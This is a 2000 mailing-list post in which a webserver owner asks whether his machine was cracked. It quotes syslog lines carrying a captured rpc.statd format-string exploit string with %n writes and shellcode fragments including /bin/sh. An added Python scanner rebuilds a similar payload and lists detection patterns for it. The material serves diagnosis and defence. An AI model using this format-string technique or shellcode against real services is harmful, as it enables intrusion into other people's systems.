
Was my system cracked? (retry 2)



I just realised my earlier tries at sending this message were full of
almost 300K of control characters. I am trying again. Apologies if it
repeats.

*****

Hi all--

I arrived home tonight to see the following message plastered across all my
terminal windows on my webserver, ludism.org:

Message from syslogd@ludism at Sat Sep 30 19:10:53 2000 ... ludism

"???" I thought, and checked the system logs, which read as follows for the
period in question:


Sep 30 19:04:50 ludism inetd[219]: smtp/tcp: bind: Address already in use
Sep 30 19:08:01 ludism /USR/SBIN/CRON[32062]: (mail) CMD ( if [ -x /usr/sbin/exim -a -f /etc/exim.conf ]; then /usr/sbin/exim -q >/dev/null 2>&1; fi)
Sep 30 19:09:00 ludism innd: ME time 599939 idle 599938(2) artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3)
Sep 30 19:10:53 ludism
Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together
Sep 30 19:10:53 ludism 173>Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname error for
^X??ø^X??ø^Y??ø^Y??ø^Z??ø^Z??ø^[??ø^[??ø%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêê1¿Î|YâA^PâA^H?¿âA^Dâ??¿â^A?fÕÄ?^BâY^L?A^Nô?A^H^PâI^DÄA^D^Là^A?fÕÄ?^D?fÕÄ?^E0¿àA^D?fÕ
Sep 30 19:10:53 ludism «^F/bin«F^D/shA0¿àF^Gâv^LçV^PçN^LâÛ?^KÕÄ?^AÕÄË???
Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U)
Sep 30 19:14:01 ludism innd: ME time 300548 idle 300544(2) artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3)

I am far from a security expert, but it looks as though someone might have
been running some sort of shell script ("/bin/sh" appears somewhere near
the end of the garbage) via rpc. I also read the IP address 236.137.10.192
near the beginning, but can't locate that machine via host or ping.

Was this one of the famous sysklogd exploits? Yes, I was lazy and did not
upgrade until tonight, but I fear it may be too late.

I also found a file dated Friday, 22 September 2000, 6:03 PM in my /var/log
directory, reading thusly:

µv?9tty1
[...a whole lot of invisible characters...]
Ð?À9tty1F*¥9tty2ÿâã8ttyp4c1019188-a.fedwy1.wa.home.comÖd 8tty2®v
8tty22?«9pts/563.225.161.91íe9ttyp4www.ludism.org

So, do you think my machine has been cracked? It looks as though they've
been trying to cover their tracks, but not doing it very well. If it is a
crack, what can I do about it apart from wiping the machine and rebuilding
from the ground up?

Thanks...

Ron Hale-Evans

--
   Ron's Info Closet: Center for Ludic Synergy, Kennexions Glass Bead Game,
    Positive Revolution FAQ, Hexagram-8 I Ching Mailing List, and links...
   Ron Hale-Evans ... rwhe@ludism.org ... <http://www.apocalypse.org/~rwhe/>
                    Further up and further in! fnord
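An added defender-side illustration, not part of Ron's message and not code from any tool named on the list: a small Python scanner that flags syslog lines carrying the indicators visible in the log quoted above. The numbers in `%236x%n%137x%n%10x%n%192x%n` are printf field widths, which pad the output so that each `%n` conversion writes a chosen count into memory; the scanner pulls them out so a triager can see what they are. The sample log lines are constructed to mirror the post, with the binary part of the statd message shortened to a run of 0x90 bytes plus `/bin/sh` (assumed stand-in, not the original bytes); the function and indicator names are this example's own.

```python
import re

# Constructed sample lines modelled on the post. The binary portion of the
# rpc.statd message is an assumed stand-in (a 0x90 run plus "/bin/sh"), not
# the original bytes from the mailing-list message.
SAMPLE_LOG = "\n".join([
    "Sep 30 19:04:50 ludism inetd[219]: smtp/tcp: bind: Address already in use",
    "Sep 30 19:08:01 ludism /USR/SBIN/CRON[32062]: (mail) CMD ( if [ -x "
    "/usr/sbin/exim -a -f /etc/exim.conf ]; then /usr/sbin/exim -q >/dev/null 2>&1; fi)",
    "Sep 30 19:09:00 ludism innd: ME time 599939 idle 599938(2) artwrite 0(0)",
    "Sep 30 19:10:53 ludism",
    "Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together",
    "Sep 30 19:10:53 ludism 173>Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname error for "
    + "%8x" * 9 + "%236x%n%137x%n%10x%n%192x%n" + "\x90" * 64 + "/bin/sh",
    "Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U)",
])

# Classic BSD syslog line. The two optional groups after the host tolerate the
# "173>" priority tag and repeated timestamp that syslogd leaves behind when it
# cannot glue a split message back together, as in the post.
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?:\d+>)?"                          # stray priority tag, e.g. "173>"
    r"(?:\w{3}\s+\d+ \d\d:\d\d:\d\d )?"   # repeated timestamp after a split message
    r"(?P<prog>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)

# Indicators of a format-string attack landing in a logged string. None of
# these belong in a hostname handed to gethostbyname().
INDICATORS = {
    "percent_n_write": re.compile(r"%\d*n"),          # %n is the write primitive
    "format_probe_run": re.compile(r"(?:%\d*x){4,}"), # stack-walking %x sequence
    "nop_sled": re.compile("\x90{16,}"),              # run of x86 NOPs
    "nonprintable_run": re.compile(r"[^\x20-\x7e]{8,}"),
    "shell_path": re.compile(r"/bin/sh"),
}


def parse_syslog_line(line):
    """Split one syslog line into its fields; None if it is a bare/dangling line."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["pid"] = int(fields["pid"]) if fields["pid"] else None
    return fields


def classify(line):
    """Return the sorted names of every indicator pattern the line matches."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(line))


def format_widths(msg):
    """Field widths preceding each %n, i.e. the values the attacker pads to."""
    return [int(w) for w in re.findall(r"%(\d+)x%n", msg)]


def scan(log_text):
    """Return one record per suspicious line: line number, program, message, indicators."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        indicators = classify(line)
        if not indicators:
            continue
        parsed = parse_syslog_line(line) or {}
        hits.append({
            "line": lineno,
            "prog": parsed.get("prog"),
            "pid": parsed.get("pid"),
            "msg": parsed.get("msg", line),
            "indicators": indicators,
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['prog']}[{hit['pid']}] -> {', '.join(hit['indicators'])}")
        print("  %n field widths:", format_widths(hit["msg"]))
```

When running this over a real /var/log/messages, read the file as bytes and decode it with `latin-1` so that the 0x90 run survives as single characters instead of raising a decoding error; the scanner is meant to confirm what is already in the log, and a hit from the network-facing daemon is the cue to treat the host as compromised rather than to tune the regexes.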


